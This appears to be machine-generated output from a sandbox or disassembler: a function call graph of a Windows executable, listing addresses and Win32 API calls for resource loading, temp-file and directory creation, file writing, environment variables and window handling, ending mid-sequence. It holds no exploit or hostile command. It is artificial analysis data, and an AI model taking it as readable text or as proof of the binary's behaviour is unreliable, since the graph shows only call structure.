8711->9469 8714 401eb7 8716 40e020 4 API calls 8714->8716 8715 401f05 8717 40e020 4 API calls 8715->8717 8718 401ebf 8716->8718 8719 401f0d 8717->8719 8720 40e020 4 API calls 8718->8720 9470 405170 TlsGetValue 8719->9470 8722 401eca 8720->8722 8724 40e020 4 API calls 8722->8724 8723 401f14 8726 40df50 HeapFree 8723->8726 8725 401ed4 8724->8725 8727 40dec0 3 API calls 8725->8727 8728 401f2b 8726->8728 8727->8711 8729 40df50 HeapFree 8728->8729 8730 401f34 8729->8730 8730->7707 8732 40385b 8731->8732 8732->8732 8733 40dfc0 21 API calls 8732->8733 8751 40386d 8733->8751 8734 4038ee 9568 40de80 GetLastError TlsGetValue SetLastError 8734->9568 8736 4038f4 9569 40de80 GetLastError TlsGetValue SetLastError 8736->9569 8738 4038fc 9570 40de80 GetLastError TlsGetValue SetLastError 8738->9570 8739 405dc0 3 API calls 8739->8751 8741 403904 9571 40de80 GetLastError TlsGetValue SetLastError 8741->9571 8743 40390c 8745 40d100 8 API calls 8743->8745 8744 40de80 GetLastError TlsGetValue SetLastError 8744->8751 8746 40391e 8745->8746 9572 405182 TlsGetValue 8746->9572 8747 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8747->8751 8749 403923 8750 405eb0 6 API calls 8749->8750 8752 40392b 8750->8752 8751->8734 8751->8739 8751->8744 8751->8747 8753 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8751->8753 8754 40dec0 3 API calls 8752->8754 8753->8751 8755 403935 8754->8755 9573 40de80 GetLastError TlsGetValue SetLastError 8755->9573 8757 40393b 9574 40de80 GetLastError TlsGetValue SetLastError 8757->9574 8759 403943 9575 40de80 GetLastError TlsGetValue SetLastError 8759->9575 8761 40394b 9576 40de80 GetLastError TlsGetValue SetLastError 8761->9576 8763 403953 8764 40d100 8 API calls 8763->8764 8765 403965 8764->8765 9577 405182 TlsGetValue 8765->9577 8767 40396a 8768 405eb0 6 API calls 8767->8768 8769 403972 8768->8769 8770 40dec0 3 API calls 8769->8770 8771 40397c 8770->8771 9578 40de80 GetLastError TlsGetValue SetLastError 8771->9578 8773 403982 9579 40de80 GetLastError TlsGetValue SetLastError 8773->9579 8775 40398a 9580 40de80 GetLastError TlsGetValue SetLastError 8775->9580 8777 403992 9581 40de80 GetLastError TlsGetValue SetLastError 8777->9581 8779 40399a 8780 40d100 8 API calls 8779->8780 8781 4039aa 8780->8781 9582 405182 TlsGetValue 8781->9582 8783 4039af 8784 405eb0 6 API calls 8783->8784 8785 4039b7 8784->8785 8786 40dec0 3 API calls 8785->8786 8787 4039c1 8786->8787 9583 40de80 GetLastError TlsGetValue SetLastError 8787->9583 8789 4039c7 9584 40de80 GetLastError TlsGetValue SetLastError 8789->9584 8791 4039cf 9585 40de80 GetLastError TlsGetValue SetLastError 8791->9585 8793 4039d7 9586 40de80 GetLastError TlsGetValue SetLastError 8793->9586 8795 4039df 8796 40d100 8 API calls 8795->8796 8797 4039ef 8796->8797 9587 405182 TlsGetValue 8797->9587 8799 4039f4 8800 405eb0 6 API calls 8799->8800 8801 4039fc 8800->8801 8802 40dec0 3 API calls 8801->8802 8803 403a06 8802->8803 9588 40de80 GetLastError TlsGetValue SetLastError 8803->9588 8805 403a0c 9589 40de80 GetLastError TlsGetValue SetLastError 8805->9589 8807 403a14 9590 40de80 GetLastError TlsGetValue SetLastError 8807->9590 8809 403a1c 9591 40de80 GetLastError TlsGetValue SetLastError 8809->9591 8811 403a24 8812 40d100 8 API calls 8811->8812 8813 403a34 8812->8813 9592 405182 TlsGetValue 8813->9592 8815 403a39 8816 405eb0 6 API calls 8815->8816 8817 403a41 8816->8817 8818 40dec0 3 API calls 8817->8818 8819 403a4b 8818->8819 9593 40de80 GetLastError TlsGetValue SetLastError 8819->9593 8821 403a51 9594 403cd7 8821->9594 8824 4051a0 3 API calls 8825 403a66 8824->8825 9635 40de80 GetLastError TlsGetValue SetLastError 8825->9635 8827 403a6c 8828 403cd7 84 API calls 8827->8828 8829 403a7c 8828->8829 8830 40dec0 3 API calls 8829->8830 8831 403a88 8830->8831 9636 40de80 GetLastError TlsGetValue SetLastError 8831->9636 8833 403a8e 8834 403cd7 84 API calls 8833->8834 8835 403a9e 8834->8835 8836 40dec0 3 API calls 8835->8836 8837 403aa8 8836->8837 9637 40de80 GetLastError TlsGetValue SetLastError 8837->9637 8839 403aae 8840 403cd7 84 API calls 8839->8840 8841 403abe 8840->8841 8842 40dec0 3 API calls 8841->8842 8843 403ac8 8842->8843 9638 40de80 GetLastError TlsGetValue SetLastError 8843->9638 8845 403ace 8846 403cd7 84 API calls 8845->8846 8847 403ade 8846->8847 8848 40dec0 3 API calls 8847->8848 8849 403ae8 8848->8849 9639 40de80 GetLastError TlsGetValue SetLastError 8849->9639 8851 403aee 9640 40de80 GetLastError TlsGetValue SetLastError 8851->9640 8853 403af6 9641 40de80 GetLastError TlsGetValue SetLastError 8853->9641 8855 403afe 8856 402bfa 43 API calls 8855->8856 8857 403b0b 8856->8857 9642 40e080 TlsGetValue 8857->9642 8859 403b10 9643 405182 TlsGetValue 8859->9643 8861 403b1f 9644 406650 8861->9644 8864 40dec0 3 API calls 8865 403b32 8864->8865 9647 40de80 GetLastError TlsGetValue SetLastError 8865->9647 8867 403b38 9648 40de80 GetLastError TlsGetValue SetLastError 8867->9648 8869 403b40 9649 40de80 GetLastError TlsGetValue SetLastError 8869->9649 8871 403b48 8872 402bfa 43 API calls 8871->8872 8873 403b55 8872->8873 9650 40e080 TlsGetValue 8873->9650 8875 403b5a 9651 405182 TlsGetValue 8875->9651 8877 403b69 8878 406650 13 API calls 8877->8878 8879 403b72 8878->8879 8880 40dec0 3 API calls 8879->8880 8881 403b7c 8880->8881 9652 40de80 GetLastError TlsGetValue SetLastError 8881->9652 8883 403b82 9653 40de80 GetLastError TlsGetValue SetLastError 8883->9653 8885 403b8e 8886 40e020 4 API calls 8885->8886 8887 403b96 8886->8887 8888 40e020 4 API calls 8887->8888 8889 403ba1 8888->8889 8890 40e020 4 API calls 8889->8890 8891 403bab 8890->8891 8892 40e020 4 API calls 8891->8892 8893 403bb5 8892->8893 8894 40e020 4 API calls 8893->8894 8895 403bbf 8894->8895 9654 40e080 TlsGetValue 8895->9654 8897 403bc4 9655 405182 TlsGetValue 8897->9655 8899 403bcf 9656 40240c 8899->9656 8902 4051a0 3 API calls 8903 403bdd 8902->8903 8904 40df50 HeapFree 8903->8904 8905 403be8 8904->8905 8906 40df50 HeapFree 8905->8906 8907 403bf1 8906->8907 8908 40df50 HeapFree 8907->8908 8909 403bfa 8908->8909 8910 40df50 HeapFree 8909->8910 8911 403c03 8910->8911 8912 40df50 HeapFree 8911->8912 8913 403c0c 8912->8913 8914 40df50 HeapFree 8913->8914 8915 403c15 8914->8915 8916 40df50 HeapFree 8915->8916 8917 403c1e 8916->8917 8918 40df50 HeapFree 8917->8918 8919 403c27 8918->8919 8920 40df50 HeapFree 8919->8920 8921 403c30 8920->8921 8922 40df50 HeapFree 8921->8922 8923 403c39 8922->8923 8924 40de80 GetLastError TlsGetValue SetLastError 8923->8924 8924->7712 8925->7718 8926->7734 8979 4054b7 EnterCriticalSection 8978->8979 8980 404502 8978->8980 8985 4054cd 8979->8985 8987 4054fd 8979->8987 8980->7731 8981 40db72 HeapAlloc 8983 405517 LeaveCriticalSection 8981->8983 8982 4054ce WaitForSingleObject 8984 4054de CloseHandle 8982->8984 8982->8985 8983->8980 8985->8982 8985->8987 8987->8981 8989 40dfc0 21 API calls 8988->8989 8990 402cb7 8989->8990 8991 405060 2 API calls 8990->8991 8993 402cc3 8991->8993 9103 40e0e0 9053->9103 9057 402bc7 9056->9057 9057->9057 9058 40dfc0 21 API calls 9057->9058 9059 402bd9 GetNativeSystemInfo 9058->9059 9060 402bec 9059->9060 9060->8203 9060->8204 9061->8230 9062->8237 9064 4055c8 9063->9064 9068 4032bd 9063->9068 9064->9068 9109 405553 memset GetModuleHandleW 9064->9109 9067 405606 GetVersionExW 9067->9068 9068->8204 9069->8212 9070->8216 9072 40e260 3 API calls 9071->9072 9073 4032ef 9072->9073 9073->8222 9074->8227 9075->8243 9076->8258 9112 40d498 EnterCriticalSection 9077->9112 9079 40add5 9080 40ae6e 9079->9080 9081 40addf CreateFileW 9079->9081 9080->8269 9082 40ae00 9081->9082 9083 40ae20 9081->9083 9082->9083 9085 40ae0d HeapAlloc 9082->9085 9086 40ae65 9083->9086 9122 40d40a EnterCriticalSection 9083->9122 9085->9083 9086->8269 9088 40a9e9 9087->9088 9089 40a9da 9087->9089 9133 40d459 EnterCriticalSection 9088->9133 9137 40d9f5 9089->9137 9094 40aa2d 9094->8270 9095 40aa19 FindCloseChangeNotification 9097 40d40a 4 API calls 9095->9097 9097->9094 9098 40aa08 HeapFree 9098->9095 9099->8277 9100->8279 9101->8211 9102->8215 9104 4032a2 9103->9104 9105 40e0ea wcslen HeapAlloc 9103->9105 9104->8199 9107 40e3a0 9105->9107 9108 40e3b0 9107->9108 9108->9104 9110 40558b 9109->9110 9111 40557b GetProcAddress 9109->9111 9110->9067 9110->9068 9111->9110 9113 40d4b2 9112->9113 9114 40d4c7 9112->9114 9115 40db72 HeapAlloc 9113->9115 9116 40d4ec 9114->9116 9117 40d4cc HeapReAlloc 9114->9117 9118 40d4c1 9115->9118 9119 40d501 HeapAlloc 9116->9119 9120 40d4f5 9116->9120 9117->9116 9121 40d51d LeaveCriticalSection 9118->9121 9119->9120 9120->9121 9121->9079 9123 40d441 9122->9123 9124 40d422 9122->9124 9130 40db32 9123->9130 9124->9123 9126 40d427 9124->9126 9127 40d430 memset 9126->9127 9128 40d44d LeaveCriticalSection 9126->9128 9127->9128 9128->9086 9129 40d44b 9129->9128 9131 40db43 HeapFree 9130->9131 9131->9129 9134 40d472 9133->9134 9135 40d47d LeaveCriticalSection 9133->9135 9134->9135 9136 40a9f6 9135->9136 9136->9094 9136->9095 9143 40aa40 9136->9143 9138 40da02 9137->9138 9139 40a9e5 9137->9139 9146 40db1b EnterCriticalSection 9138->9146 9139->8270 9142 40da08 9142->9139 9147 40dac4 9142->9147 9144 40aa54 WriteFile 9143->9144 9145 40aa7c 9143->9145 9144->9098 9145->9098 9146->9142 9149 40dad0 9147->9149 9148 40db14 9148->9142 9149->9148 9150 40db0a LeaveCriticalSection 9149->9150 9150->9148 9152 409ba8 RtlAllocateHeap 9151->9152 9153 409bba 9151->9153 9152->8303 9153->8303 9168 40e7e0 9154->9168 9156 402f24 9156->8308 9158 40dfc0 21 API calls 9157->9158 9159 4026c1 LoadResource SizeofResource 9158->9159 9160 409ba0 RtlAllocateHeap 9159->9160 9161 4026ee 9160->9161 9187 409c80 memcpy 9161->9187 9163 402705 FreeResource 9164 402715 9163->9164 9165 4046ef 9164->9165 9188 409b60 9165->9188 9167 4046f8 9167->8306 9169 40e7f8 __fprintf_l 9168->9169 9171 40e8aa __fprintf_l 9169->9171 9172 40e950 9169->9172 9171->9156 9173 40f3b2 9172->9173 9177 40e960 __fprintf_l 9172->9177 9173->9169 9174 40ef37 9178 40efa4 __fprintf_l 9174->9178 9179 4104f0 9174->9179 9176 40ee4f memcpy 9176->9177 9177->9173 9177->9174 9177->9176 9178->9169 9180 410504 9179->9180 9181 410572 memcpy 9180->9181 9182 41054c memcpy 9180->9182 9184 41051f 9180->9184 9185 410599 memcpy 9181->9185 9186 4105b8 9181->9186 9182->9178 9184->9178 9185->9178 9186->9178 9187->9163 9189 409b68 HeapSize 9188->9189 9190 409b7a 9188->9190 9189->9167 9190->9167 9191->8321 9192->8329 9193->8320 9194->8324 9195->8328 9196->8332 9198 409c29 9197->9198 9199 409c19 9197->9199 9200 40e260 3 API calls 9198->9200 9299 409bc0 9199->9299 9203 409c3f 9200->9203 9305 40e3f0 TlsGetValue 9203->9305 9205 409c68 9205->8336 9206->8340 9306 405f90 9207->9306 9209 402211 9209->8345 9210->8349 9211->8351 9212->8353 9213->8355 9214->8359 9215->8365 9216->8367 9217->8369 9218->8371 9220 40590f 9219->9220 9227 405801 9219->9227 9316 40e340 TlsGetValue 9220->9316 9222 405918 9222->8373 9223 405886 9225 40e1e0 TlsGetValue 9223->9225 9224 405850 wcsncmp 9224->9227 9226 4058c7 9225->9226 9228 4058e9 9226->9228 9315 40e230 TlsGetValue 9226->9315 9227->9223 9227->9224 9229 40e260 3 API calls 9228->9229 9231 4058f0 9229->9231 9233 405901 9231->9233 9234 4058f6 wcsncpy 9231->9234 9232 4058d7 memmove 9232->9228 9233->8373 9234->9233 9235->8375 9236->8377 9237->8379 9238->8383 9239->8385 9317 408e58 9240->9317 9242 408f81 9243 408e58 3 API calls 9242->9243 9244 408f90 9243->9244 9245 408e58 3 API calls 9244->9245 9246 408fa3 9245->9246 9247 408fb0 GetStockObject 9246->9247 9248 408fbd LoadIconW LoadCursorW RegisterClassExW 9246->9248 9247->9248 9321 4094d1 GetForegroundWindow 9248->9321 9253 409047 IsWindowEnabled 9254 40906b 9253->9254 9255 409052 EnableWindow 9253->9255 9256 4094d1 3 API calls 9254->9256 9255->9254 9257 40907e GetSystemMetrics GetSystemMetrics CreateWindowExW 9256->9257 9258 4092ba 9257->9258 9259 4090cb SetWindowLongW CreateWindowExW SendMessageW 9257->9259 9260 4092cd 9258->9260 9335 40e340 TlsGetValue 9258->9335 9261 409125 9259->9261 9262 409128 CreateWindowExW SendMessageW SetFocus 9259->9262 9336 408e9a 9260->9336 9261->9262 9264 4091a5 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 9262->9264 9265 40917b SendMessageW wcslen wcslen SendMessageW 9262->9265 9268 40926a 9264->9268 9265->9264 9270 409273 9268->9270 9271 40922e GetMessageW 9268->9271 9269 408e9a HeapFree 9272 4092df 9269->9272 9274 409277 DestroyAcceleratorTable 9270->9274 9275 40927e 9270->9275 9271->9270 9273 409243 TranslateAcceleratorW 9271->9273 9276 408e9a HeapFree 9272->9276 9273->9268 9277 409254 TranslateMessage DispatchMessageW 9273->9277 9274->9275 9275->9258 9278 409285 wcslen 9275->9278 9279 4022e5 9276->9279 9277->9268 9280 40e260 3 API calls 9278->9280 9279->8388 9281 40929c wcscpy HeapFree 9280->9281 9281->9258 9282->8394 9283->8396 9284->8398 9285->8400 9286->8404 9287->8411 9288->8413 9289->8415 9290->8419 9291->8421 9293 4094d1 3 API calls 9292->9293 9294 408e2d 9293->9294 9295 409588 16 API calls 9294->9295 9296 408e36 MessageBoxW 9295->9296 9297 409588 16 API calls 9296->9297 9298 40239f 9297->9298 9298->8424 9300 409bcd 9299->9300 9301 40e260 3 API calls 9300->9301 9302 409beb 9301->9302 9303 409bf1 memcpy 9302->9303 9304 409bff 9302->9304 9303->9304 9304->8336 9305->9205 9309 405fa1 9306->9309 9307 40e1e0 TlsGetValue 9308 406014 9307->9308 9310 40e260 3 API calls 9308->9310 9309->9307 9309->9309 9311 406022 9310->9311 9313 406032 9311->9313 9314 40e370 TlsGetValue 9311->9314 9313->9209 9314->9313 9315->9232 9316->9222 9318 408e60 wcslen HeapAlloc 9317->9318 9319 408e96 9317->9319 9318->9319 9320 408e86 wcscpy 9318->9320 9319->9242 9320->9242 9322 409032 9321->9322 9323 4094e2 GetWindowThreadProcessId GetCurrentProcessId 9321->9323 9324 409588 9322->9324 9323->9322 9325 409592 EnumWindows 9324->9325 9330 4095dd 9324->9330 9326 40903e 9325->9326 9327 4095af 9325->9327 9339 409507 GetWindowThreadProcessId GetCurrentThreadId 9325->9339 9326->9253 9326->9254 9327->9326 9329 4095b1 GetCurrentThreadId 9327->9329 9332 4095c4 SetWindowPos 9327->9332 9328 4095ea GetCurrentThreadId 9328->9330 9329->9327 9330->9326 9330->9328 9331 409600 EnableWindow 9330->9331 9333 409611 SetWindowPos 9330->9333 9334 40db32 HeapFree 9330->9334 9331->9330 9332->9327 9333->9330 9334->9330 9335->9260 9337 408ea1 HeapFree 9336->9337 9338 408eb3 9336->9338 9337->9338 9338->9269 9340 409525 IsWindowVisible 9339->9340 9341 40957f 9339->9341 9340->9341 9342 409530 9340->9342 9343 40db72 HeapAlloc 9342->9343 9344 40953c GetCurrentThreadId GetWindowLongW 9343->9344 9345 40955a 9344->9345 9346 40955e GetForegroundWindow 9344->9346 9345->9346 9346->9341 9347 409568 IsWindowEnabled 9346->9347 9347->9341 9348 409573 EnableWindow 9347->9348 9348->9341 9349->8435 9350->8438 9352 40e260 3 API calls 9351->9352 9353 40a769 GetTempPathW LoadLibraryW 9352->9353 9354 40a7a4 9353->9354 9355 40a786 GetProcAddress 9353->9355 9377 40e3f0 TlsGetValue 9354->9377 9356 40a796 GetLongPathNameW 9355->9356 9357 40a79d FreeLibrary 9355->9357 9356->9357 9357->9354 9359 401a0d 9359->8441 9360->8445 9361->8447 9378 40a7b9 9362->9378 9365 40a6c5 9366 40a6d4 wcsncpy wcslen 9365->9366 9367 401a6a GetTempFileNameW 9365->9367 9368 40a708 CreateDirectoryW 9366->9368 9370 40de80 GetLastError TlsGetValue SetLastError 9367->9370 9368->9367 9370->8458 9371->8460 9372->8470 9373->8472 9374->8480 9375->8482 9376->8488 9377->9359 9379 40a7c0 9378->9379 9380 401a5f 9378->9380 9381 40a7d6 DeleteFileW 9379->9381 9382 40a7c7 SetFileAttributesW 9379->9382 9380->9365 9381->9380 9382->9381 9383->8501 9385 40a961 SetCurrentDirectoryW 9384->9385 9386 4046cb 9384->9386 9385->9386 9386->8509 9387->8590 9388->8625 9389->8533 9390->8544 9391->8534 9392->8543 9393->8552 9395 40e260 3 API calls 9394->9395 9396 40a84f 9395->9396 9397 40a85e LoadLibraryW 9396->9397 9403 40a8e9 9396->9403 9398 40a8cb 9397->9398 9399 40a86f GetProcAddress 9397->9399 9454 40a96c SHGetFolderLocation 9398->9454 9400 40a8c0 FreeLibrary 9399->9400 9407 40a884 9399->9407 9400->9398 9408 40a91b 9400->9408 9404 40a96c 4 API calls 9403->9404 9403->9408 9404->9408 9405 40362c 9405->8580 9407->9400 9409 40a896 wcscpy wcscat wcslen CoTaskMemFree 9407->9409 9460 40e3f0 TlsGetValue 9408->9460 9409->9400 9410->8547 9411->8565 9412->8554 9413->8570 9414->8566 9415->8586 9416->8571 9417->8591 9418->8577 9419->8598 9420->8592 9421->8611 9422->8599 9423->8616 9424->8612 9425->8621 9427 409368 CoInitialize 9426->9427 9428 409379 memset LoadLibraryW 9426->9428 9427->9428 9429 4093a3 GetProcAddress GetProcAddress 9428->9429 9430 4094ab 9428->9430 9431 4093d2 wcsncpy wcslen 9429->9431 9432 4093cd 9429->9432 9433 40e260 3 API calls 9430->9433 9434 409401 9431->9434 9432->9431 9435 4094b8 9433->9435 9436 4094d1 3 API calls 9434->9436 9461 40e3f0 TlsGetValue 9435->9461 9437 40941f 9436->9437 9439 409588 16 API calls 9437->9439 9441 409442 9439->9441 9440 4037c6 9440->8636 9442 409588 16 API calls 9441->9442 9443 409457 9442->9443 9444 40949f FreeLibrary 9443->9444 9445 40e260 3 API calls 9443->9445 9444->9430 9444->9435 9446 409468 CoTaskMemFree wcslen 9445->9446 9446->9444 9448 409493 9446->9448 9448->9444 9450 40553b timeBeginPeriod 9449->9450 9451 40554d Sleep 9449->9451 9450->9451 9452->8613 9453->8622 9455 40a98b SHGetPathFromIDListW 9454->9455 9456 40a8d3 wcscat wcslen 9454->9456 9457 40a9b5 CoTaskMemFree 9455->9457 9458 40a999 wcslen 9455->9458 9456->9408 9457->9456 9458->9457 9459 40a9a6 9458->9459 9459->9457 9460->9405 9461->9440 9462->8658 9463->8660 9464->8666 9465->8668 9466->8672 9467->8691 9468->8693 9469->8715 9470->8723 9471->8702 9473 4024f7 9472->9473 9473->9473 9474 40dfc0 21 API calls 9473->9474 9475 402509 9474->9475 9476 4051a0 3 API calls 9475->9476 9495 402512 9476->9495 9477 402593 9538 40de80 GetLastError TlsGetValue SetLastError 9477->9538 9479 402599 9539 40de80 GetLastError TlsGetValue SetLastError 9479->9539 9481 4025a1 GetCommandLineW 9483 409bc0 4 API calls 9481->9483 9482 405dc0 3 API calls 9482->9495 9484 4025ae 9483->9484 9486 40dec0 3 API calls 9484->9486 9485 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9485->9495 9487 4025b8 9486->9487 9540 40de80 GetLastError TlsGetValue SetLastError 9487->9540 9488 40de80 GetLastError TlsGetValue SetLastError 9488->9495 9490 4025c2 9491 40e020 4 API calls 9490->9491 9492 4025ca 9491->9492 9493 40dec0 3 API calls 9492->9493 9496 4025d4 PathRemoveArgsW 9493->9496 9494 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 9494->9495 9495->9477 9495->9482 9495->9485 9495->9488 9495->9494 9497 4025eb 9496->9497 9498 402651 9497->9498 9541 40de80 GetLastError TlsGetValue SetLastError 9497->9541 9500 4098c0 SetEnvironmentVariableW 9498->9500 9502 40265e 9500->9502 9501 4025fd 9503 40e020 4 API calls 9501->9503 9554 40de80 GetLastError TlsGetValue SetLastError 9502->9554 9505 40260a 9503->9505 9542 40de80 GetLastError TlsGetValue SetLastError 9505->9542 9506 402668 9508 40e020 4 API calls 9506->9508 9510 402670 9508->9510 9509 402610 9543 40de80 GetLastError TlsGetValue SetLastError 9509->9543 9555 405170 TlsGetValue 9510->9555 9513 402677 9516 40df50 HeapFree 9513->9516 9514 402618 9544 40de80 GetLastError TlsGetValue SetLastError 9514->9544 9518 40268f 9516->9518 9517 402620 9545 40de80 GetLastError TlsGetValue SetLastError 9517->9545 9521 40df50 HeapFree 9518->9521 9520 402628 9546 406110 9520->9546 9523 402698 9521->9523 9525 40df50 HeapFree 9523->9525 9524 402639 9553 405182 TlsGetValue 9524->9553 9527 4026a1 9525->9527 9529 40df50 HeapFree 9527->9529 9528 40263e 9530 406060 5 API calls 9528->9530 9531 4026aa 9529->9531 9532 402646 9530->9532 9533 40df50 HeapFree 9531->9533 9534 40dec0 3 API calls 9532->9534 9535 401ea4 9533->9535 9534->9498 9535->8708 9536->8714 9537->8703 9538->9479 9539->9481 9540->9490 9541->9501 9542->9509 9543->9514 9544->9517 9545->9520 9547 406146 9546->9547 9549 406118 9546->9549 9565 40e340 TlsGetValue 9547->9565 9549->9549 9556 406080 9549->9556 9550 40614f 9550->9524 9553->9528 9554->9506 9555->9513 9557 40e1e0 TlsGetValue 9556->9557 9558 40609c 9557->9558 9559 40e260 3 API calls 9558->9559 9560 4060a8 9559->9560 9561 4060b4 9560->9561 9566 40e370 TlsGetValue 9560->9566 9567 40e3f0 TlsGetValue 9561->9567 9564 4060fd 9564->9524 9565->9550 9566->9561 9567->9564 9568->8736 9569->8738 9570->8741 9571->8743 9572->8749 9573->8757 9574->8759 9575->8761 9576->8763 9577->8767 9578->8773 9579->8775 9580->8777 9581->8779 9582->8783 9583->8789 9584->8791 9585->8793 9586->8795 9587->8799 9588->8805 9589->8807 9590->8809 9591->8811 9592->8815 9593->8821 9595 40dfc0 21 API calls 9594->9595 9596 403ce3 9595->9596 9597 4051a0 3 API calls 9596->9597 9598 403cec 9597->9598 9599 405060 2 API calls 9598->9599 9600 403cf8 FindResourceW 9599->9600 9601 403db3 9600->9601 9602 403d1b 9600->9602 9724 40de80 GetLastError TlsGetValue SetLastError 9601->9724 9603 4026b8 26 API calls 9602->9603 9605 403d2a 9603->9605 9607 4046ef HeapSize 9605->9607 9606 403dbd 9608 40e020 4 API calls 9606->9608 9609 403d37 9607->9609 9610 403dc5 9608->9610 9671 4011de 9609->9671 9725 405170 TlsGetValue 9610->9725 9614 403dcc 9617 40df50 HeapFree 9614->9617 9615 403d5a 9695 4046ff 9615->9695 9616 403d7c 9711 40de80 GetLastError TlsGetValue SetLastError 9616->9711 9620 403de3 9617->9620 9623 40df50 HeapFree 9620->9623 9622 403d82 9712 40de80 GetLastError TlsGetValue SetLastError 9622->9712 9626 403a61 9623->9626 9626->8824 9627 403d7a 9726 40e0b0 TlsGetValue 9627->9726 9628 403d8a 9713 409cb0 9628->9713 9630 403da0 9632 40dec0 3 API calls 9630->9632 9633 403daa 9632->9633 9723 409b80 HeapFree 9633->9723 9635->8827 9636->8833 9637->8839 9638->8845 9639->8851 9640->8853 9641->8855 9642->8859 9643->8861 9803 406310 9644->9803 9646 403b28 9646->8864 9647->8867 9648->8869 9649->8871 9650->8875 9651->8877 9652->8883 9653->8885 9654->8897 9655->8899 9657 405060 2 API calls 9656->9657 9658 40241f 9657->9658 9659 405060 2 API calls 9658->9659 9660 40242c 9659->9660 9833 40acb0 9660->9833 9664 402457 9665 40a9d0 11 API calls 9664->9665 9666 402464 9665->9666 9667 40df50 HeapFree 9666->9667 9668 40248b 9667->9668 9669 40df50 HeapFree 9668->9669 9670 402494 9669->9670 9670->8902 9672 4011e6 9671->9672 9672->9672 9673 405060 2 API calls 9672->9673 9674 4011ff 9673->9674 9727 405700 9674->9727 9677 409b60 HeapSize 9678 401214 9677->9678 9679 40dbca 4 API calls 9678->9679 9680 401236 9679->9680 9681 40dbca 4 API calls 9680->9681 9682 401254 9681->9682 9683 40dbca 4 API calls 9682->9683 9684 4014ac 9683->9684 9685 40dbca 4 API calls 9684->9685 9686 4014ca 9685->9686 9734 409b80 HeapFree 9686->9734 9688 4014d3 9689 40df50 HeapFree 9688->9689 9690 4014e3 9689->9690 9691 40dd1d 2 API calls 9690->9691 9692 4014ed 9691->9692 9693 40dd1d 2 API calls 9692->9693 9694 4014f6 9693->9694 9694->9615 9694->9616 9696 40dfc0 21 API calls 9695->9696 9697 40470d 9696->9697 9698 405060 2 API calls 9697->9698 9699 404719 9698->9699 9700 40472c 9699->9700 9735 40249b 9699->9735 9709 40473d 9700->9709 9744 40acd0 9700->9744 9703 40df50 HeapFree 9704 403d71 9703->9704 9710 409b80 HeapFree 9704->9710 9705 40474f 9706 40478f 9705->9706 9705->9709 9755 40afb0 9705->9755 9708 40a9d0 11 API calls 9706->9708 9708->9709 9709->9703 9710->9627 9711->9622 9712->9628 9714 409cd0 9713->9714 9717 409d28 9713->9717 9715 40e260 3 API calls 9714->9715 9716 409cf9 9715->9716 9802 40e3f0 TlsGetValue 9716->9802 9718 409d83 MultiByteToWideChar 9717->9718 9720 40e260 3 API calls 9718->9720 9722 409da0 MultiByteToWideChar 9720->9722 9721 409d1d 9721->9630 9722->9630 9723->9601 9724->9606 9725->9614 9726->9614 9728 405710 WideCharToMultiByte 9727->9728 9729 40570b 9727->9729 9730 409ba0 RtlAllocateHeap 9728->9730 9729->9728 9731 405730 9730->9731 9732 405736 WideCharToMultiByte 9731->9732 9733 401207 9731->9733 9732->9733 9733->9677 9734->9688 9736 405060 2 API calls 9735->9736 9737 4024ac 9736->9737 9766 40ada0 9737->9766 9740 4024d3 9742 40df50 HeapFree 9740->9742 9741 40a9d0 11 API calls 9741->9740 9743 4024eb 9742->9743 9743->9700 9745 40d498 5 API calls 9744->9745 9746 40ace5 9745->9746 9747 40ad97 9746->9747 9748 40acef CreateFileW 9746->9748 9747->9705 9749 40ad10 CreateFileW 9748->9749 9750 40ad2c 9748->9750 9749->9750 9751 40ad4d 9749->9751 9750->9751 9752 40ad39 HeapAlloc 9750->9752 9753 40d40a 4 API calls 9751->9753 9754 40ad8e 9751->9754 9752->9751 9753->9754 9754->9705 9756 40afc2 9755->9756 9757 40b015 9755->9757 9758 40b00d 9756->9758 9759 40d459 2 API calls 9756->9759 9757->9706 9758->9706 9760 40afda 9759->9760 9761 40b003 9760->9761 9762 40aff2 WriteFile 9760->9762 9763 40afe4 9760->9763 9761->9706 9762->9761 9791 40b020 9763->9791 9765 40afec 9765->9706 9769 40aac0 9766->9769 9768 4024bf 9768->9740 9768->9741 9770 40aad8 9769->9770 9771 40d498 5 API calls 9770->9771 9772 40aaef 9771->9772 9773 40aca2 9772->9773 9774 40ab02 9772->9774 9775 40ab3e 9772->9775 9773->9768 9777 40ab19 9774->9777 9778 40ab1c CreateFileW 9774->9778 9776 40ab43 9775->9776 9781 40ab7c 9775->9781 9779 40ab5a 9776->9779 9780 40ab5d CreateFileW 9776->9780 9777->9778 9784 40abe8 9778->9784 9779->9780 9780->9784 9782 40aba7 CreateFileW 9781->9782 9781->9784 9783 40abc9 CreateFileW 9782->9783 9782->9784 9783->9784 9785 40ac22 9784->9785 9787 40ac0e HeapAlloc 9784->9787 9788 40ac70 9784->9788 9785->9788 9789 40ac5c SetFilePointer 9785->9789 9786 40d40a 4 API calls 9786->9773 9787->9785 9788->9786 9790 40ac81 9788->9790 9789->9788 9790->9768 9792 40b127 9791->9792 9793 40b03a 9791->9793 9792->9765 9794 40b040 SetFilePointer 9793->9794 9795 40b06b 9793->9795 9794->9795 9797 40aa40 WriteFile 9795->9797 9799 40b077 9795->9799 9796 40b0a7 9796->9765 9798 40b0ee 9797->9798 9798->9799 9800 40b0f5 WriteFile 9798->9800 9799->9796 9801 40b091 memcpy 9799->9801 9800->9765 9801->9765 9802->9721 9804 40631f 9803->9804 9805 406438 9804->9805 9816 4063ae 9804->9816 9806 40e1e0 TlsGetValue 9805->9806 9808 406442 9806->9808 9807 40660a 9807->9646 9809 40645a 9808->9809 9810 40644a _wcsdup 9808->9810 9811 40e1e0 TlsGetValue 9809->9811 9810->9809 9812 406460 9811->9812 9813 406477 9812->9813 9814 406468 _wcsdup 9812->9814 9815 40e1e0 TlsGetValue 9813->9815 9814->9813 9817 406480 9815->9817 9816->9807 9818 4063fc wcsncpy 9816->9818 9820 40642e 9816->9820 9819 406488 _wcsdup 9817->9819 9822 406498 9817->9822 9818->9816 9819->9822 9820->9646 9821 40e260 3 API calls 9823 406520 9821->9823 9822->9821 9824 406572 wcsncpy 9823->9824 9825 406526 9823->9825 9828 40658d 9823->9828 9824->9828 9826 4065e4 9825->9826 9827 4065db free 